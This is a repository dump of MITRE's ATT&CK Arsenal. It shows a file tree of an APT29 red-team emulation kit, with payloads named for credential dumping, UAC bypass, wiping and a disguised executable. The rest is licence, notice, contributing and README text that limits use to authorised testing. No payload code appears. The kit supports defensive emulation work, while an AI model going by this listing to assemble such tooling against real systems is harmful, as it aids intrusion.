├── CONTRIBUTING.md ├── LICENSE.txt ├── NOTICE.txt ├── README.md └── adversary_emulation └── APT29 ├── NOTICE.txt ├── CALDERA_DIY └── evals │ ├── ISSUES.md │ ├── LICENSE │ ├── README.md │ ├── app │ ├── gui_api.py │ └── parsers │ │ ├── ntlm.py │ │ ├── sessionid.py │ │ └── sid.py │ ├── data │ ├── abilities │ │ ├── collection │ │ │ ├── 0b1841bd-ef8b-475c-bce7-8fcb2860984a.yml │ │ │ ├── 5692da31-3586-4e4f-8f07-5750070c730b.yml │ │ │ ├── a4b14c10-49aa-4ae4-b165-d5a37364fe62.yml │ │ │ ├── a81ea4ad-bc9f-49a7-82d4-4466df641487.yml │ │ │ ├── b1dcc53a-c86c-46ba-8a3d-e1da74a8db3c.yml │ │ │ ├── db28f68d-e8b8-46e6-b680-642570d4b257.yml │ │ │ ├── ee4c2eab-be57-434c-a32c-14b77360301a.yml │ │ │ └── fc231955-774f-442c-ac0e-e74dfda50c5c.yml │ │ ├── credential-access │ │ │ ├── 1dba454c-0e4f-4fe0-8bc9-b17e8c5c9a24.yml │ │ │ ├── 267bad86-3f06-49f1-9a3e-6522f2a61e7a.yml │ │ │ ├── 4ef6009d-2d62-4bb4-8de9-0458df2e9567.yml │ │ │ ├── c4f4b13c-87b6-498c-b814-93570173068c.yml │ │ │ ├── e7cab9bb-3e3a-4d93-99cc-3593c1dc8c6d.yml │ │ │ └── effbedc1-1bc8-4a75-9395-980559700008.yml │ │ ├── defensive-evasion │ │ │ ├── 03afada1-1714-408f-bde5-f528b91dc89d.yml │ │ │ ├── 208b021b-c79a-4176-8ad1-3af99ed50c6f.yml │ │ │ ├── 4a2ad84e-a93a-4b2e-b1f0-c354d6a41278.yml │ │ │ ├── 4bedbd9b-a570-4f9f-b78a-2f7f99ad5e92.yml │ │ │ ├── 5226e5dc-fc28-43b7-a679-0db49d520402.yml │ │ │ ├── 5ff80022-8d85-410b-b868-6c7565b267e5.yml │ │ │ ├── 68b588bc-002a-42dc-bac7-9189f944065b.yml │ │ │ └── 9b5b5aec-32ff-4d74-8555-727b50ab15f6.yml │ │ ├── discovery │ │ │ ├── 0cfadbcb-ec21-44ae-adb7-9a23176dd620.yml │ │ │ ├── 144b1384-5060-494f-80eb-91772695cdf3.yml │ │ │ ├── 1c8552c7-f7ed-4523-b640-72d65af5f855.yml │ │ │ ├── 24ed020e-4730-4000-b6b4-6b5d3e95314f.yml │ │ │ ├── 26181249-be75-41ed-9fe7-5c30ea8c2d4d.yml │ │ │ ├── 2b5a72b1-01e4-48ae-98b0-2570a7894371.yml │ │ │ ├── 2ff877b4-0c00-401e-9d3f-070c70b610df.yml │ │ │ ├── 35d95b64-c1f8-4ac7-a2f2-8959218239cd.yml │ │ │ ├── 41610306-087c-4c34-874b-37b8ed633a36.yml │ │ │ ├── 59592c35-8207-4896-8d8b-36ad4600245d.yml │ │ │ ├── 5c23f638-9cfc-4fc4-9cab-4af628fef70a.yml │ │ │ ├── 5df12481-9d8c-4235-b550-9cefc8ed7361.yml │ │ │ ├── 5f4263c4-7ff1-4098-b5f5-f41faa31cf5b.yml │ │ │ ├── 61221fb9-cb32-46d5-98fd-90567a621526.yml │ │ │ ├── 646be6c9-f27a-4f5f-be5d-b8a0317e215f.yml │ │ │ ├── 64f1fcb4-399d-4f3b-9a6b-13ec00e1c2ce.yml │ │ │ ├── 6f1f4768-7099-45d2-a858-b49dc792234e.yml │ │ │ ├── 7c2a6e5b-1adb-464f-a581-4677391f8dd6.yml │ │ │ ├── 84377d7a-0363-44fd-a082-44657ca1858f.yml │ │ │ ├── 96140694-6d13-40b6-9553-0e63533469f3.yml │ │ │ ├── 9ce5bf9f-44ec-44c4-bbe0-6d68a83e1b76.yml │ │ │ ├── a34ab8f2-a106-41fb-af0b-cf5382bd18ae.yml │ │ │ ├── a42be479-fc26-4d7c-9e63-7a9b74e4c8d2.yml │ │ │ ├── ba0b398d-91b8-490a-bed2-f959afa8e1aa.yml │ │ │ ├── d2ea2676-7f85-4228-b980-ab3c0e1adc03.yml │ │ │ ├── d5170a60-3bdc-44e0-9870-a38db5c0cf81.yml │ │ │ ├── ee08a427-1e1d-4d8a-aeb1-978a7fcf9087.yml │ │ │ ├── f320eebd-e75b-4194-b529-79e64ad0b9ee.yml │ │ │ ├── f9c0b150-822f-497b-ad6d-187f24561e9a.yml │ │ │ └── faa96e7f-081a-40b7-a743-a6a7f2627ea3.yml │ │ ├── execution │ │ │ ├── 08e57385-dbce-4850-8bb7-589ef79465ab.yml │ │ │ ├── 571845f6-b75c-4b9d-a666-a78f7827261f.yml │ │ │ ├── 95564347-e77a-4a89-b08f-dcafa5468f2c.yml │ │ │ ├── a5daa530-c640-49bc-aa54-6808789a684a.yml │ │ │ ├── c4a59e39-53b0-4ace-9528-8ff052752ece.yml │ │ │ └── e506f811-884d-4992-aacb-514b33a0324f.yml │ │ ├── exfiltration │ │ │ ├── 2d18c8ec-4593-49dc-9bf4-11d0673d6ae6.yml │ │ │ ├── 4840d6dd-da13-401a-be46-05db56f4e1e0.yml │ │ │ ├── 68e209dd-f354-4adc-8bc6-e85a3e55a7f4.yml │ │ │ └── a612311d-a802-48da-bb7f-88a4b9dd7a24.yml │ │ ├── host-provision │ │ │ └── 865b6ad9-ba59-435a-bd8f-641052fc077a.yml │ │ ├── impact │ │ │ ├── 4b2e9574-b1a7-4b38-95b2-6054ded9c4fe.yml │ │ │ └── f820b93d-6176-4a72-a138-a70b0b549c49.yml │ │ ├── lateral-movement │ │ │ ├── 00446217-53ca-4749-bacd-f41fe189d36e.yml │ │ │ ├── acecc8f7-18c2-41fd-87bc-39ffd644e4e9.yml │ │ │ └── bddc0abc-07a0-41b7-813f-e0c64d9226b3.yml │ │ ├── persistence │ │ │ ├── 43aad2d6-d16a-4adb-aa2b-9510a3be4c52.yml │ │ │ ├── 45f18b58-c14f-4b61-a3da-41b67af21429.yml │ │ │ ├── 9c75155e-21ab-4471-af16-45f3795a313c.yml │ │ │ └── afb8d8f7-d059-4825-95ae-c5727e2db320.yml │ │ ├── privilege-escalation │ │ │ ├── 088b8639-3f37-42cc-9dc8-01aabb645461.yml │ │ │ ├── 1345bff7-6f26-43b2-a92a-9aabccdb3db0.yml │ │ │ └── 89e9dffa-8836-4672-8cf3-bebd006d2a2b.yml │ │ └── stage-capabilities │ │ │ └── 4f7d21c9-ea31-4943-ad8a-efbbeeccdd7d.yml │ ├── adversaries │ │ ├── 148c819b-b022-43cb-a25c-3f6f5c71318d.yml │ │ ├── 3af0e59b-0d2a-48cd-b934-c46d5d1621d6.yml │ │ ├── 6dc5b558-c7bd-4835-860b-50e003399f8d.yml │ │ ├── 7916aaa3-f05d-453a-b632-f0f73b0865ce.yml │ │ ├── 80e9c544-c5ea-423d-b4f3-c0de3c2947ba.yml │ │ ├── 842d1d8e-a49d-4f11-9e97-79ce9d2f1732.yml │ │ ├── c9b6f5d3-ebde-4df1-9c15-ce1f339170c7.yml │ │ ├── d6115456-604a-4707-b30e-079dec5aad53.yml │ │ ├── e55da81a-9ce7-4da8-8313-074362fd5dee.yml │ │ └── ef93dd1b-809b-4a0b-b686-fef549cabbe4.yml │ └── sources │ │ └── 4fb34bde-b06d-445a-a146-8e35f79ce546.yml │ ├── hook.py │ ├── imgs │ ├── 0-caldera.png │ ├── 1-caldera.png │ ├── 10-caldera.png │ ├── 11-caldera.png │ ├── 12-caldera.png │ ├── 2-caldera.png │ ├── 3-caldera.png │ ├── 4-caldera.png │ ├── 5-caldera.png │ ├── 6-caldera.png │ ├── 7-caldera.png │ ├── 8-caldera.png │ ├── 9-caldera.png │ └── CALDERA-APT29-README.tar │ ├── payloads │ ├── 2016_United_States_presidential_election_-_Wikipedia.html │ ├── File-Collection.ps1 │ ├── Get-Screenshot.ps1 │ ├── Invoke-BypassUACTokenManipulation.ps1 │ ├── Invoke-Mimikatz.ps1 │ ├── Invoke-PSInject.ps1 │ ├── MITRE-ATTACK-EVALS.HTML │ ├── Modified-SysInternalsSuite.zip │ ├── README.md │ ├── StealToken.ps1 │ ├── dmevals.local.pfx │ ├── invoke-winrmsession.ps1 │ ├── m.exe │ ├── make_lnk.ps1 │ ├── monkey.png │ ├── powerview.ps1 │ ├── ps.ps1 │ ├── rar.exe │ ├── sandcat.go-windows │ ├── sandcat.go-windows-upx │ ├── schemas.ps1 │ ├── setup.py │ ├── stepFifteen_wmi.ps1 │ ├── stepFourteen_bypassUAC.ps1 │ ├── stepFourteen_credDump.ps1 │ ├── stepSeventeen_email.ps1 │ ├── stepSeventeen_zip.ps1 │ ├── stepSixteen_SID.ps1 │ ├── stepThirteen.ps1 │ ├── stepTwelve.ps1 │ ├── timestomp.ps1 │ ├── update.ps1 │ ├── upload.ps1 │ ├── wipe.ps1 │ └── ‮cod.3aka.scr.exe │ └── templates │ └── evals.html ├── Emulation_Plan ├── APT29_EmuPlan.pdf ├── APT29_Opflow.png ├── Day 1 │ ├── README.md │ ├── install_day1_tools.sh │ ├── payload_configs.md │ ├── payloads │ │ ├── Seaduke │ │ │ ├── python.exe │ │ │ ├── rar.exe │ │ │ └── sdelete64.exe │ │ ├── SysinternalsSuite │ │ │ ├── hostui.txt │ │ │ ├── javamtsup.exe │ │ │ ├── psversion.txt │ │ │ ├── readme.txt │ │ │ └── strings64.exe │ │ ├── cod.3aka3.scr │ │ ├── hostui.cpp │ │ ├── monkey.png │ │ └── shockwave.local.pfx │ └── rtlo.png ├── Day 2 │ ├── README.md │ └── payloads │ │ ├── 2016_United_States_presidential_election_-_Wikipedia.html │ │ ├── Invoke-Mimikatz.ps1 │ │ ├── Invoke-WinRMSession.ps1 │ │ ├── MITRE-ATTACK-EVALS.HTML │ │ ├── m │ │ ├── make_lnk.ps1 │ │ ├── powerview.ps1 │ │ ├── schemas.ps1 │ │ ├── stepFifteen_wmi.ps1 │ │ ├── stepFourteen_bypassUAC.ps1 │ │ ├── stepFourteen_credDump.ps1 │ │ ├── stepSeventeen_email.ps1 │ │ ├── stepSeventeen_zip.ps1 │ │ ├── stepSixteen_SID.ps1 │ │ ├── stepThirteen.ps1 │ │ ├── stepTwelve.ps1 │ │ ├── timestomp.ps1 │ │ └── wipe.ps1 └── README.md └── README.md /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | # How to contribute 2 | 3 | Thanks for contributing to `attack-arsenal`! 4 | 5 | You are welcome to comment on issues, open new issues, and open pull requests. 6 | 7 | Pull requests should target the **develop** branch of the repository. 8 | 9 | Also, if you contribute any source code, we need you to agree to the following Developer's Certificate of Origin below. 10 | 11 | ## Developer's Certificate of Origin v1.1 12 | 13 | ``` 14 | By making a contribution to this project, I certify that: 15 | 16 | (a) The contribution was created in whole or in part by me and I 17 | have the right to submit it under the open source license 18 | indicated in the file; or 19 | 20 | (b) The contribution is based upon previous work that, to the best 21 | of my knowledge, is covered under an appropriate open source 22 | license and I have the right under that license to submit that 23 | work with modifications, whether created in whole or in part 24 | by me, under the same open source license (unless I am 25 | permitted to submit under a different license), as indicated 26 | in the file; or 27 | 28 | (c) The contribution was provided directly to me by some other 29 | person who certified (a), (b) or (c) and I have not modified 30 | it. 31 | 32 | (d) I understand and agree that this project and the contribution 33 | are public and that a record of the contribution (including all 34 | personal information I submit with it, including my sign-off) is 35 | maintained indefinitely and may be redistributed consistent with 36 | this project or the open source license(s) involved. 37 | ``` -------------------------------------------------------------------------------- /LICENSE.txt: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "{}" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright 2020 Williams, Jamie C. 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | -------------------------------------------------------------------------------- /NOTICE.txt: -------------------------------------------------------------------------------- 1 | Copyright 2020 The MITRE Corporation 2 | 3 | Approved for Public Release; Distribution Unlimited. Case Number 19-1369. 4 | 5 | Licensed under the Apache License, Version 2.0 (the "License"); 6 | you may not use this file except in compliance with the License. 7 | You may obtain a copy of the License at 8 | 9 | http://www.apache.org/licenses/LICENSE-2.0 10 | 11 | Unless required by applicable law or agreed to in writing, software 12 | distributed under the License is distributed on an "AS IS" BASIS, 13 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | See the License for the specific language governing permissions and 15 | limitations under the License. 16 | 17 | This project makes use of ATT&CK® 18 | ATT&CK Terms of Use — https://attack.mitre.org/resources/terms-of-use/ -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Welcome to the ATT&CK Arsenal 2 | 3 | This is a collection of red team and adversary emulation resources developed and released by MITRE. 4 | 5 | Content within ATT&CK Arsenal may align or be derived from many efforts including [ATT&CK](https://attack.mitre.org/), [ATT&CK Evaluations](https://attackevals.mitre.org/), or other threat-informed defense research initiatives. 6 | 7 | ## Liability / Responsible Usage 8 | 9 | This content is only to be used with appropriate prior, explicit authorization for the purposes of assessing security posture and/or research. 10 | 11 | ## Notice 12 | 13 | Copyright 2020 The MITRE Corporation 14 | 15 | Approved for Public Release; Distribution Unlimited. Case Number 19-1369. 16 | 17 | Licensed under the Apache License, Version 2.0 (the "License"); 18 | you may not use this file except in compliance with the License. 19 | You may obtain a copy of the License at 20 | 21 | http://www.apache.org/licenses/LICENSE-2.0 22 | 23 | Unless required by applicable law or agreed to in writing, software 24 | distributed under the License is distributed on an "AS IS" BASIS, 25 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 26 | See the License for the specific language governing permissions and 27 | limitations under the License. 28 | 29 | This project makes use of ATT&CK® 30 | 31 | [ATT&CK Terms of Use](https://attack.mitre.org/resources/terms-of-use/) -------------------------------------------------------------------------------- /adversary_emulation/APT29/ NOTICE.txt: -------------------------------------------------------------------------------- 1 | Copyright 2020 The MITRE Corporation 2 | 3 | Approved for Public Release; Distribution Unlimited. Case Number 19-03607-2. 4 | 5 | Licensed under the Apache License, Version 2.0 (the "License"); 6 | you may not use this file except in compliance with the License. 7 | You may obtain a copy of the License at 8 | 9 | http://www.apache.org/licenses/LICENSE-2.0 10 | 11 | Unless required by applicable law or agreed to in writing, software 12 | distributed under the License is distributed on an "AS IS" BASIS, 13 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | See the License for the specific language governing permissions and 15 | limitations under the License. 16 | 17 | This project makes use of ATT&CK® 18 | ATT&CK Terms of Use — https://attack.mitre.org/resources/terms-of-use/ 19 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/ISSUES.md: -------------------------------------------------------------------------------- 1 | ## How to Report an Issue 2 | Before reporting an issue with GitHub, be sure that: 3 | 4 | * you are using version 2.6.6 of CALDERA. 5 | * the issue was not already reported. 6 | * you follow the example template below. 7 | 8 | ``` 9 | ### Work environment 10 | * OS: 11 | * Golang Version: 12 | * Python Version: 13 | 14 | ### Expected behavior 15 | 16 | 17 | ### Actual behavior 18 | ``` 19 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND 